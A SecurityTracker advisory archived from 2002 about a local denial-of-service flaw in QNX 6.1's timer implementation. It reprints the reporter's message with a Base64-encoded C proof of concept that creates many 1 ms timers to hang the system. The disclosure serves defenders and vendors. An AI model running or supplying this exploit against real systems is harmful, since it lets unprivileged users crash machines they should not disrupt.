SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   OS (Other)  >   QNX Vendors:   QNX Software Systems Ltd.
QNX Operating System Timer Implementation Bug Lets Local Users Crash the System
SecurityTracker Alert ID:  1005547
SecurityTracker URL:  http://securitytracker.com/id/1005547
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 6 2002
Impact:   Denial of service via local system
Exploit Included:  Yes  
Version(s): 6.1
Description:   A denial of service vulnerability was reported in the QNX real-time operating system. A local user can cause the system to hang.

It is reported that a local user can create code with two or more timers with 1 ms ticks to cause the system to hang.

A demonstration exploit is provided in the Source Message [it is Base64 encoded].
Impact:   A local user may be able to cause the system to hang.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.qnx.com/products/ps_neutrino/ (Links to External Site)
Cause:   Exception handling error, State error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Wed, 6 Nov 2002 16:40:36 +0100 (CET)
Subject:  QNX 6.1 TimeCreate weakness


--0-1067694718-1036597236=:24001
Content-Type: TEXT/PLAIN; charset=US-ASCII


I've found bug in QNX-6.1 timer implementation. After creating
some number (at least 2) of timers with 1 ms tick system hangs.
Please consider attached source code. Code can be executed by
unprivilegged users.


Pawel Pisarczyk
------------------------
IMMOS - IMMOrtal Systems


--0-1067694718-1036597236=:24001
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="timer-exploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSF.4.43L0.0211061640360.24001@yoda.immos.com.pl>
Content-Description: 
Content-Disposition: attachment; filename="timer-exploit.c"

LyoNCiAqIFFOWCBSVFAgNi4xIExvY2FsIERvUyBleHBsb2l0DQogKg0KICog
YXV0aG9yOiBQYXdlbCBQaXNhcmN6eWsgPHBhd2VsQGltbW9zLmNvbS5wbD4s
IDIwMDINCiAqDQogKiBBZnRlciBjb21waWxhdGlvbiBhbmQgb3V0cHV0IGJp
bmFyeSBleGVjdXRpb24gc3lzdGVtIGhhbmdzLg0KICovDQogDQojaW5jbHVk
ZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0
ZGRlZi5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0
ZC5oPg0KI2luY2x1ZGUgPHB0aHJlYWQuaD4NCiNpbmNsdWRlIDxzeXMvbmV1
dHJpbm8uaD4NCiNpbmNsdWRlIDxpbnR0eXBlcy5oPg0KDQoNCmludCBtYWlu
KGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQoJc3RydWN0IHNpZ2V2ZW50
IGV2ZW50Ow0KCXN0cnVjdCBfaXRpbWVyIGl0aW1lcjsNCglpbnQgY2hpZDsN
CglpbnQgdG1pZDsNCglpbnQgY29pZDsNCglpbnQgazsNCgkJDQoNCglpZiAo
KGNoaWQgPSBDaGFubmVsQ3JlYXRlKDApKSA8IDApIHsNCgkJZnByaW50Zihz
dGRlcnIsICJDYW4ndCBjcmVhdGUgY2hhbm5lbCFcbiIpOw0KCQlleGl0KC0x
KTsNCgl9DQoJDQoJaWYgKChjb2lkID0gQ29ubmVjdEF0dGFjaCgwLCBnZXRw
aWQoKSwgY2hpZCwgMCwgMCkpIDwgMCkgew0KCQlmcHJpbnRmKHN0ZGVyciwg
IkNhbid0IGNvbm5lY3QgdG8gY2hhbm5lbCFcbiIpOw0KCQlleGl0KC0xKTsN
Cgl9DQoJDQoJDQoJZm9yIChrID0gMDsgayA8IDE2OyBrKyspIHsNCgkNCgkJ
U0lHRVZfUFVMU0VfSU5JVCgmZXZlbnQsIGNvaWQsIDE2LCBfUFVMU0VfQ09E
RV9NSU5BVkFJTCArIDEsIGspOw0KCQkNCgkJaWYgKCh0bWlkID0gVGltZXJD
cmVhdGUoQ0xPQ0tfUkVBTFRJTUUsICZldmVudCkpIDwgMCkgew0KCQkJZnBy
aW50ZihzdGRlcnIsICJDYW4ndCBjcmVhdGUgdGltZXIhXG4iKTsNCgkJCXJl
dHVybiAtMTsNCgkJfQ0KDQoNCgkJaXRpbWVyLm5zZWMgPSAxMDAwMDAwOw0K
CQlpdGltZXIuaW50ZXJ2YWxfbnNlYyA9IDEwMDAwMDA7DQoJCVRpbWVyU2V0
dGltZSh0bWlkLCAwLCAmaXRpbWVyLCBOVUxMKTsNCgl9DQoJDQoJDQoJd2hp
bGUgKGdldGMoc3RkaW4pICE9ICcjJyk7DQoJcmV0dXJuIDA7DQp9DQo=
--0-1067694718-1036597236=:24001--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC